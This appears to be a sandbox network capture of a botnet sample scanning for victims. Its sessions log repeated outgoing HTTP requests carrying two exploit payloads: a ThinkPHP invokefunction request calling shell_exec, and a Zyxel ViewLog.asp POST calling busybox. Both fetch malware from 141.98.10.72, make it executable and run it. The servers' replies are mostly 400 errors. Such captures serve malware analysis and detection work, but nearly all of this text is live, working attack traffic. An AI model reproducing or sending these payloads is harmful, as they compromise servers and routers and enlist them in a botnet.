                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.739664078 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.960674047 CET490INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:53 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      461192.168.2.155187295.216.123.18280
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.764312983 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.989485025 CET115INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/plain; charset=utf-8
                                                      Connection: close
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      462192.168.2.155359895.0.98.8880
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:56.976905107 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:57.227466106 CET443INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:29:57 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload;
                                                      Permissions-Policy: camera=(), microphone=(), geolocation=()
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      463192.168.2.155991495.143.149.19380
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:57.053015947 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:57.287772894 CET122INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 20 Mar 2002 01:49:23 GMT
                                                      Server: cisco-IOS
                                                      Accept-Ranges: none
                                                      Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a
                                                      Data Ascii: 400 Bad Request


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      464192.168.2.155076431.136.99.1668080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:57.180116892 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:57.817329884 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:59.097305059 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:01.881203890 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:07.001038074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:17.240746021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:39.256103039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:20.215112925 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      465192.168.2.154270695.216.127.24980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:57.507595062 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:57.727019072 CET321INHTTP/1.1 400 Bad Request
                                                      Server: nginx/1.24.0
                                                      Date: Wed, 14 Feb 2024 08:23:22 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 157
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      466192.168.2.153547831.136.46.1428080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:58.187196970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:01.369204998 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:07.513134956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:19.544780970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399967909 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:34.550806999 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      467192.168.2.153959631.136.238.1868080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:58.407536983 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:01.625186920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:07.769144058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:19.800723076 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399954081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:34.550718069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      468192.168.2.155149431.136.255.438080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:58.409009933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:01.625179052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:07.769150972 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:19.800702095 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:45.399952888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
